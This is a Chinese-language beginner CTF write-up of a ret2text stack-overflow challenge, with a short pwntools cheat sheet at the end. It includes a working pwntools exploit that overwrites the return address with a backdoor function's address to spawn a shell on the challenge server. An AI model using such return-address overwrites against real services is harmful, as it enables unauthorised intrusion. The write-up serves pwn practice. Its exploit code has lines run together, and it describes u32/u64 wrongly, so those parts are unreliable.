新手上路~低速慢行~

目录

前言

1. checksec

2. IDA 反汇编

3. payload编写

4. exp编写

5. pwntools用法

前言

作为pwn新手，尽可能在刷题中，记录、学习一些通用的知识点，因此wp是少不了的。

本题是一道简单的ret2text

1. checksec

没有开启栈保护

2. IDA 反汇编

发现危险函数read

发现后门函数backdoor

3. payload编写

通过buf距离栈基址偏移10h

 且后门函数地址为0x4006E6   可以构造：

payload: 填充buf(10h)+填充ebp（64位→8字节）+修改return地址(0x4006E6)

payload=b’a’*(0x10+0x8)+p64(0x4006E6)

4. exp编写

基本的代码框架

from pwn import *
r=remote("node2.anna.nssctf.cn",28076)r.recvuntil("name:\\\\n")
r.sendline("-1") 
r.recvuntil("name?")backdoor=0x4006e6
payload=b'a'*(0x10+0x8)+p64(backdoor)
r.sendline(payload)
r.interactive()

如此即可获得shell，cat flag即可获得flag

5. pwntools用法

这里

作为最好用的pwn工具，简单记一下用法：

• 连接：本地process()、远程remote( , )；对于remote函数可以接url并且指定端口
• 数据处理：主要是对整数进行打包：p32、p64是打包为二进制，u32、u64是解包为二进制
• IO模块：这个比较容易跟zio搞混，记住zio是read、write，pwn是recv、send